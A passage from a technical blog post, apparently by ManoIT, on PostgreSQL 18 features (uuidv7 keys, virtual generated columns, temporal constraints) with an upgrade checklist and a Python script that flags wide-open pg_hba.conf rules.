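print(sorted([later, earlier]) == [earlier, later])  # True
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because the timestamp occupies the most significant bits, sorting the UUIDs sorts them by creation millisecond, which is why new keys cluster on the right-most B-Tree leaf pages.&lt;/p&gt;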

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Strategy&lt;/th&gt;
&lt;th&gt;Distribution&lt;/th&gt;
&lt;th&gt;Hot Index Pages&lt;/th&gt;
&lt;th&gt;WAL Burden&lt;/th&gt;
&lt;th&gt;Read Cache Hit Rate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;uuidv4()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fully random&lt;/td&gt;
&lt;td&gt;Spread across all pages&lt;/td&gt;
&lt;td&gt;High (all pages dirtied)&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;uuidv7()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Time-ordered&lt;/td&gt;
&lt;td&gt;Concentrated on latest pages&lt;/td&gt;
&lt;td&gt;Low (localized writes)&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bigserial&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Increasing integer&lt;/td&gt;
&lt;td&gt;Concentrated on latest pages&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Use uuidv7() as a PK default in PostgreSQL 18&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;orders&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;id&lt;/span&gt;          &lt;span class="n"&gt;UUID&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;uuidv7&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;   &lt;span class="c1"&gt;-- ← 18 new&lt;/span&gt;
  &lt;span class="n"&gt;customer_id&lt;/span&gt; &lt;span class="nb"&gt;BIGINT&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;amount&lt;/span&gt;      &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;created_at&lt;/span&gt;  &lt;span class="n"&gt;TIMESTAMPTZ&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;now&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- Extract the embedded timestamp from a UUIDv7&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;uuid_extract_timestamp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;embedded_ts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;created_at&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;uuid_extract_timestamp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;created_at&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;skew&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt;   &lt;span class="n"&gt;orders&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt;  &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="k"&gt;DESC&lt;/span&gt;
&lt;span class="k"&gt;LIMIT&lt;/span&gt;  &lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Schema pattern: the creation time is embedded in id, so a separate&lt;/span&gt;
&lt;span class="c1"&gt;-- created_at DEFAULT now() column can often be dropped (millisecond precision).&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Caveat: &lt;code&gt;uuidv7()&lt;/code&gt; values are &lt;strong&gt;only approximately sorted&lt;/strong&gt;. Values generated at almost the same instant, particularly by concurrent sessions, are not guaranteed to arrive in key order, so high-throughput workloads still see some page splits near the right edge of the index. Even so, index cache hit rates typically improve by 10–30 percentage points over UUIDv4.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. Virtual Generated Columns — Computed Columns as the New Default
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 12 introduced &lt;em&gt;stored&lt;/em&gt; generated columns that materialize values on disk. 18 adds &lt;strong&gt;virtual generated columns&lt;/strong&gt; and &lt;strong&gt;makes virtual the default&lt;/strong&gt;. Virtual columns compute at query time, so they don't take disk space, and changing the expression doesn't trigger a table rewrite.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- In 18, GENERATED ALWAYS AS ... VIRTUAL is the default&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;invoices&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;id&lt;/span&gt;           &lt;span class="n"&gt;UUID&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="n"&gt;uuidv7&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
  &lt;span class="n"&gt;subtotal&lt;/span&gt;     &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;tax_rate&lt;/span&gt;     &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt; &lt;span class="k"&gt;DEFAULT&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="c1"&gt;-- total: STORED must be spelled out; total_v: VIRTUAL is implicit (keyword optional)&lt;/span&gt;
  &lt;span class="n"&gt;total&lt;/span&gt;        &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;GENERATED&lt;/span&gt; &lt;span class="n"&gt;ALWAYS&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;subtotal&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tax_rate&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;STORED&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;-- ← STORED explicit&lt;/span&gt;
  &lt;span class="n"&gt;total_v&lt;/span&gt;      &lt;span class="nb"&gt;NUMERIC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;GENERATED&lt;/span&gt; &lt;span class="n"&gt;ALWAYS&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;subtotal&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;tax_rate&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;         &lt;span class="c1"&gt;-- ← VIRTUAL default&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- STORED vs VIRTUAL: only STORED can be indexed today&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;INDEX&lt;/span&gt; &lt;span class="n"&gt;idx_invoices_total&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;invoices&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;total&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;-- VIRTUAL: not indexable in 18 (under review for 19)&lt;/span&gt;
&lt;span class="c1"&gt;-- If you need an index, declare STORED explicitly.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  7. Temporal Constraints — WITHOUT OVERLAPS and PERIOD
&lt;/h2&gt;

&lt;p&gt;PostgreSQL 18 brings SQL-standard &lt;strong&gt;temporal constraints&lt;/strong&gt; for data that has a time dimension: hotel reservations, employee tenure periods, contract validity windows.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.1 WITHOUT OVERLAPS — Period Non-Overlap
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
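&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- btree_gist supplies GiST equality operators for the scalar room_id column&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;EXTENSION&lt;/span&gt; &lt;span class="k"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;EXISTS&lt;/span&gt; &lt;span class="n"&gt;btree_gist&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Hotel reservation: bookings for the same room must not overlap in time&lt;/span&gt;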
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;reservations&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;room_id&lt;/span&gt;    &lt;span class="nb"&gt;INT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;period&lt;/span&gt;     &lt;span class="n"&gt;daterange&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;guest_name&lt;/span&gt; &lt;span class="nb"&gt;TEXT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="c1"&gt;-- 18 new: WITHOUT OVERLAPS on the period column&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;room_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt; &lt;span class="k"&gt;WITHOUT&lt;/span&gt; &lt;span class="k"&gt;OVERLAPS&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- Overlap test: before 18 this needed an EXCLUDE USING gist constraint or a custom trigger&lt;/span&gt;
&lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;INTO&lt;/span&gt; &lt;span class="n"&gt;reservations&lt;/span&gt; &lt;span class="k"&gt;VALUES&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;101&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daterange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-01'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-05'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="s1"&gt;'Alice'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;INTO&lt;/span&gt; &lt;span class="n"&gt;reservations&lt;/span&gt; &lt;span class="k"&gt;VALUES&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;101&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daterange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-03'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'2026-06-07'&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="s1"&gt;'Bob'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="c1"&gt;-- ERROR: conflicting key value violates exclusion constraint "reservations_pkey"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
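
&lt;p&gt;Conceptually, the constraint rejects a row when another row has the same &lt;code&gt;room_id&lt;/code&gt; and an overlapping &lt;code&gt;period&lt;/code&gt;. A minimal Python sketch of that rule, assuming &lt;code&gt;daterange&lt;/code&gt;'s default half-open &lt;code&gt;[)&lt;/code&gt; bounds (the helper names are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;from datetime import date


def overlaps(a, b):
    """True if half-open ranges a = [a0, a1) and b = [b0, b1) share at least one day."""
    # The intersection of two half-open ranges is [max(starts), min(ends)).
    start = max(a[0], b[0]).toordinal()
    stop = min(a[1], b[1]).toordinal()
    return bool(range(start, stop))  # an empty range means no overlap


def conflicts(rows, room_id, period):
    """Rows that would violate PRIMARY KEY (room_id, period WITHOUT OVERLAPS)."""
    return [row for row in rows if row[0] == room_id and overlaps(row[1], period)]


alice = (101, (date(2026, 6, 1), date(2026, 6, 5)), "Alice")
print(len(conflicts([alice], 101, (date(2026, 6, 3), date(2026, 6, 7)))))  # 1: Bob's insert fails
print(len(conflicts([alice], 101, (date(2026, 6, 5), date(2026, 6, 7)))))  # 0: adjacent, [) bounds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The second call shows the half-open behavior: a checkout on June 5 and a new check-in on June 5 do not collide.&lt;/p&gt;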



&lt;h3&gt;
  
  
  7.2 PERIOD — Temporal Foreign Key
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Employee tenure: each employee row must reference a department whose period&lt;/span&gt;
&lt;span class="c1"&gt;-- (or several contiguous department rows combined) covers the employee's period.&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;departments&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;dept_id&lt;/span&gt;   &lt;span class="nb"&gt;INT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;period&lt;/span&gt;    &lt;span class="n"&gt;daterange&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;dept_name&lt;/span&gt; &lt;span class="nb"&gt;TEXT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dept_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt; &lt;span class="k"&gt;WITHOUT&lt;/span&gt; &lt;span class="k"&gt;OVERLAPS&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;employee_history&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;emp_id&lt;/span&gt;    &lt;span class="nb"&gt;INT&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;period&lt;/span&gt;    &lt;span class="n"&gt;daterange&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;dept_id&lt;/span&gt;   &lt;span class="nb"&gt;INT&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;emp_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt; &lt;span class="k"&gt;WITHOUT&lt;/span&gt; &lt;span class="k"&gt;OVERLAPS&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;-- 18 new: temporal foreign key using PERIOD&lt;/span&gt;
  &lt;span class="k"&gt;FOREIGN&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dept_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PERIOD&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;REFERENCES&lt;/span&gt; &lt;span class="n"&gt;departments&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dept_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PERIOD&lt;/span&gt; &lt;span class="n"&gt;period&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- ⚠️ note: temporal FKs do not yet support RESTRICT / CASCADE /&lt;/span&gt;
&lt;span class="c1"&gt;-- SET NULL / SET DEFAULT on ON DELETE or ON UPDATE — only NO ACTION&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
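
&lt;p&gt;The temporal foreign key is satisfied when the referenced department rows, taken together, cover the whole employee period; no single department row has to contain it. The Python sketch below models that coverage rule with day sets, assuming half-open &lt;code&gt;[)&lt;/code&gt; date ranges. It is an illustration with hypothetical helper names, not how PostgreSQL evaluates the constraint internally.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;from datetime import date


def days(period):
    """Expand a half-open [start, end) date period into a set of day ordinals."""
    start, end = period
    return set(range(start.toordinal(), end.toordinal()))


def fk_satisfied(departments, dept_id, emp_period):
    """Sketch of FOREIGN KEY (dept_id, PERIOD period) for one employee row."""
    covered = set()
    for d_id, d_period in departments:
        if d_id == dept_id:
            covered.update(days(d_period))  # union of all matching department periods
    return days(emp_period).issubset(covered)


depts = [
    (10, (date(2026, 1, 1), date(2026, 7, 1))),
    (10, (date(2026, 7, 1), date(2027, 1, 1))),  # contiguous second row for dept 10
]
print(fk_satisfied(depts, 10, (date(2026, 6, 1), date(2026, 8, 1))))   # True: spans both rows
print(fk_satisfied(depts, 10, (date(2026, 12, 1), date(2027, 2, 1))))  # False: runs past 2027-01-01
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;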



&lt;p&gt;Implementation detail: temporal constraints are backed by GiST indexes, which are typically larger than equivalent B-Tree indexes. And because the ON DELETE / ON UPDATE actions are limited, treat temporal foreign keys as a &lt;em&gt;partial implementation of the SQL standard&lt;/em&gt; when you adopt them.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. ManoIT Internal Cluster Verification Checklist
&lt;/h2&gt;

&lt;p&gt;The 12-step sequence ManoIT applied to internal RDS PostgreSQL 18 (18.1 → 18.4) plus on-prem 18 clusters, alongside the io_method transition and OAuth rollout:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Verification Command / Action&lt;/th&gt;
&lt;th&gt;Expected Outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;refint triggers&lt;/td&gt;
&lt;td&gt;Run the SQL from §2.1&lt;/td&gt;
&lt;td&gt;0 rows expected; if any, migrate immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;MD5 users&lt;/td&gt;
&lt;td&gt;Run the SQL from §2.2&lt;/td&gt;
&lt;td&gt;All should be scram-sha-256&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;SSL/GSS exposure&lt;/td&gt;
&lt;td&gt;Review &lt;code&gt;hostssl&lt;/code&gt; / &lt;code&gt;hostgssenc&lt;/code&gt; CIDRs in &lt;code&gt;pg_hba.conf&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;No internet-wide (0.0.0.0/0) rules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Logical replication owner&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SELECT subname, subowner::regrole FROM pg_subscription;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Confirm subscriber owners are known roles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Apply 18.4 patch&lt;/td&gt;
&lt;td&gt;RDS: in-place minor upgrade to 18.4 during maintenance window; on-prem: &lt;code&gt;apt install postgresql-18=18.4-1&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Confirm version 18.4, all extensions compatible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;io_method&lt;/code&gt; transition&lt;/td&gt;
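&lt;td&gt;Keep &lt;code&gt;worker&lt;/code&gt; or switch to &lt;code&gt;io_uring&lt;/code&gt; (Linux 5.1+, server built with liburing); requires a restart&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SHOW io_method;&lt;/code&gt; reports the new value; read latency in &lt;code&gt;pg_stat_io&lt;/code&gt; no worse than baseline
&lt;/td&gt;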
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;OAuth pg_hba.conf&lt;/td&gt;
&lt;td&gt;Apply §4.1–4.3 and &lt;code&gt;pg_reload_conf()&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Keep scram-sha-256 line for emergency access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Adopt uuidv7()&lt;/td&gt;
&lt;td&gt;Change new tables' PK to &lt;code&gt;DEFAULT uuidv7()&lt;/code&gt;; existing tables go dual-column&lt;/td&gt;
&lt;td&gt;Watch index cache hit rate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Virtual Generated Columns&lt;/td&gt;
&lt;td&gt;Only keep STORED where indexes are required&lt;/td&gt;
&lt;td&gt;Confirm table size decrease&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Temporal Constraints PoC&lt;/td&gt;
&lt;td&gt;Adopt &lt;code&gt;WITHOUT OVERLAPS&lt;/code&gt; in reservation/contract domains&lt;/td&gt;
&lt;td&gt;Unit-test rejecting overlapping INSERTs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Standby replication&lt;/td&gt;
&lt;td&gt;Patch streaming replicas to 18.4, monitor lag&lt;/td&gt;
&lt;td&gt;Lag returns to &amp;lt;1s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Rollback plan&lt;/td&gt;
&lt;td&gt;18.4 → 18.3 downgrade is unsupported → verify base-backup restore plan&lt;/td&gt;
&lt;td&gt;Confirm 30-day PITR window&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
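
&lt;p&gt;Step 3 is easy to automate. The Python sketch below flags &lt;code&gt;host*&lt;/code&gt; lines in a &lt;code&gt;pg_hba.conf&lt;/code&gt; whose address field is &lt;code&gt;all&lt;/code&gt; or a zero-length prefix such as &lt;code&gt;0.0.0.0/0&lt;/code&gt; or &lt;code&gt;::/0&lt;/code&gt;. It is a hypothetical helper, not a ManoIT tool; it assumes the CIDR form of the address field and does not handle hostnames, &lt;code&gt;samehost&lt;/code&gt;/&lt;code&gt;samenet&lt;/code&gt;, the separate IP-mask form, included files, or &lt;code&gt;#&lt;/code&gt; characters inside quoted option values.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import ipaddress


def wide_open_rules(hba_text):
    """Return (line_number, line) for host* rules that accept any client address."""
    findings = []
    for line_no, raw in enumerate(hba_text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()  # drop comments, then split on whitespace
        if not fields or not fields[0].startswith("host"):
            continue  # blank, comment-only, or 'local' lines
        address = fields[3:4]  # TYPE DATABASE USER ADDRESS METHOD ...
        if not address:
            continue
        if address[0] == "all":
            findings.append((line_no, raw))
            continue
        try:
            network = ipaddress.ip_network(address[0], strict=False)
        except ValueError:
            continue  # hostname, samehost/samenet, etc.: not handled in this sketch
        if network.prefixlen == 0:
            findings.append((line_no, raw))
    return findings


SAMPLE = """\
hostssl  all  all    0.0.0.0/0   scram-sha-256
hostssl  all  admin  10.0.0.0/8  scram-sha-256
hostgssenc all all   ::/0        gss
local    all  postgres           peer
"""
for line_no, line in wide_open_rules(SAMPLE):
    print(line_no, line.split()[3])  # 1 0.0.0.0/0, then 3 ::/0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;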

